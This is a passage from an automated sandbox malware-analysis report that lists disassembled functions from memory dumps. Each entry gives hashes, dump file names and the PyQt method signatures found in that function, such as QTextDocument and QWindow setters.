                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setDesignDocument@@Metrics@Text
                                                                                                                                                                                                                                          • String ID: QTextDocument$setUseDesignMetrics$setUseDesignMetrics(self, b: bool)
                                                                                                                                                                                                                                          • API String ID: 209413394-1329671153
                                                                                                                                                                                                                                          • Opcode ID: 856a20fcc9714bb87b32b2cd06f7d5eb80f310fa7672d898a5a88e56af9819ce
                                                                                                                                                                                                                                          • Instruction ID: 1be4a8510afbfb7884500601ce503aead892ccdd49553b8238599db39118970c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 856a20fcc9714bb87b32b2cd06f7d5eb80f310fa7672d898a5a88e56af9819ce
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE11EC76A18E46D1EB10DF21E8896A933A5FB48F94F914132DA9E03320EF3DE55AC704
                                                                                                                                                                                                                                          Function 00007FF89D9A0030 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setBlock@@TextVisible@
                                                                                                                                                                                                                                          • String ID: QTextBlock$setVisible$setVisible(self, visible: bool)
                                                                                                                                                                                                                                          • API String ID: 3250239804-1468847327
                                                                                                                                                                                                                                          • Opcode ID: af6e6c7b2ca2356ade5f08a8c612922e88ae6150640075015529104251acf341
                                                                                                                                                                                                                                          • Instruction ID: aff684b3e550caa1a8d0588733a6b8f1dc8f5ab2c34fe4f0a06def07d2a9ed12
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af6e6c7b2ca2356ade5f08a8c612922e88ae6150640075015529104251acf341
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2611E576A18E46D1EB10DF15E8896A933A5FB84F84F914032DA9E03320EF7DE56AC704
                                                                                                                                                                                                                                          Function 00007FF89D946010 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setIncluded@LeadingLine@@Text
                                                                                                                                                                                                                                          • String ID: QTextLine$setLeadingIncluded$setLeadingIncluded(self, included: bool)
                                                                                                                                                                                                                                          • API String ID: 3820243448-400583806
                                                                                                                                                                                                                                          • Opcode ID: e456543b3ad771402115c6e53a19c8e67eb61b04e1b059c2a9f4210f764cb7f3
                                                                                                                                                                                                                                          • Instruction ID: 3e03f28b296e6358272d362836beed7b08aec3b574092e2a9986592a5ccc0545
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e456543b3ad771402115c6e53a19c8e67eb61b04e1b059c2a9f4210f764cb7f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7311E576A18E46D1EB10DF15E8896A933B5FB88BC4F914132DA9E03320EF3DE55AC704
                                                                                                                                                                                                                                          Function 00007FF89D970070 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setMinimumWidth@Window@@
                                                                                                                                                                                                                                          • String ID: QWindow$setMinimumWidth$setMinimumWidth(self, w: int)
                                                                                                                                                                                                                                          • API String ID: 1069717703-4103828744
                                                                                                                                                                                                                                          • Opcode ID: cf1221459b7be02671f2ed043f786d1e72af8e92878b518db1de0c5c1ae41351
                                                                                                                                                                                                                                          • Instruction ID: c4b0140f29757774c42d57d8e182f7af73a5b7611ae1f44acf1e5ee5ca4a10d1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf1221459b7be02671f2ed043f786d1e72af8e92878b518db1de0c5c1ae41351
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E11FA36A18E46D1EB10DF15E8896A933B5FB44F94F914132DA9E03320EF7DE95AC704
                                                                                                                                                                                                                                          Function 00007FF89D990040 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setCellCharColumnFormat@@Span@TableText
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$setTableCellColumnSpan$setTableCellColumnSpan(self, atableCellColumnSpan: int)
                                                                                                                                                                                                                                          • API String ID: 2204635040-3990220477
                                                                                                                                                                                                                                          • Opcode ID: fb4029ce9c6d449d3488985c8eb3a405c1e5cc3fdeef137354643852dbeacbf7
                                                                                                                                                                                                                                          • Instruction ID: 0e54407a07b3c392a0c83552a97746c8d4ade4ff9bea873c1ec5f7e0b5830524
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb4029ce9c6d449d3488985c8eb3a405c1e5cc3fdeef137354643852dbeacbf7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE110636A18E46D1EB10CB14E8896A933B5FB44BC4F914032DA8E03320EF3DE95AC744
                                                                                                                                                                                                                                          Function 00007FF89D932050 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setDecimals@DoubleValidator@@
                                                                                                                                                                                                                                          • String ID: QDoubleValidator$setDecimals$setDecimals(self, a0: int)
                                                                                                                                                                                                                                          • API String ID: 2819870426-3906973720
                                                                                                                                                                                                                                          • Opcode ID: db5592f7993a5e7b7484ce3043f71c349e3d924298b1ea0aeb9c2aab4e741a0e
                                                                                                                                                                                                                                          • Instruction ID: f984a7ec78a379309c69bb23c746d325ca70773d66b0476f5779a67e24f380b7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db5592f7993a5e7b7484ce3043f71c349e3d924298b1ea0aeb9c2aab4e741a0e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B112A76A18E46D1EB10DF11E8896A933E5FB44F84F914132DA8E03320EF3DE56AC704
                                                                                                                                                                                                                                          Function 00007FF89D985FE0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setFormat@@Samples@Surface
                                                                                                                                                                                                                                          • String ID: QSurfaceFormat$setSamples$setSamples(self, numSamples: int)
                                                                                                                                                                                                                                          • API String ID: 3471402103-3816964038
                                                                                                                                                                                                                                          • Opcode ID: 2c9586ae7107bc9e06712c8e674de121344f5702c3ae291cdc13402909c1d43b
                                                                                                                                                                                                                                          • Instruction ID: 810a6e7b396cb1e7c744cf7c2568341ff74fd8a23f9a715375e1d74d8bbbb1ea
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c9586ae7107bc9e06712c8e674de121344f5702c3ae291cdc13402909c1d43b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D511FA76A18E46D1EB10DF15E8896A933A4FB44FC4F914132DA9E07320EF3DE95AC744
                                                                                                                                                                                                                                          Function 00007FF89D933F20 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742542378.00007FF89DB32000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742588047.00007FF89DB38000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742620970.00007FF89DB3A000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742676190.00007FF89DB45000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742709268.00007FF89DB51000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742742292.00007FF89DB57000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?removeItem@List@@Text
                                                                                                                                                                                                                                          • String ID: QTextList$removeItem$removeItem(self, i: int)
                                                                                                                                                                                                                                          • API String ID: 3474726683-2227753569
                                                                                                                                                                                                                                          • Opcode ID: a7b8af425b1980b13ccf9a59897331bf1e0902af47b202c59232be8e25efd1c6
                                                                                                                                                                                                                                          • Instruction ID: d1ae3e12e94a38b66e2b2f5f136d842fa474660bd264320a090591e3a7074e12
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7b8af425b1980b13ccf9a59897331bf1e0902af47b202c59232be8e25efd1c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08111836A08E46D1EB10CF10E8896A933E5FB48F94F914132DA8E03320EF39E55AC704
                                                                                                                                                                                                                                          Function 00007FF89D9AFF30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742030889.00007FF89D930000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742215970.00007FF89DA5B000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742369525.00007FF89DB18000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742408105.00007FF89DB1A000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742472955.00007FF89DB1E000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742507094.00007FF89DB26000.00000004.00000001.01000000.00000025.sdmpDownload File
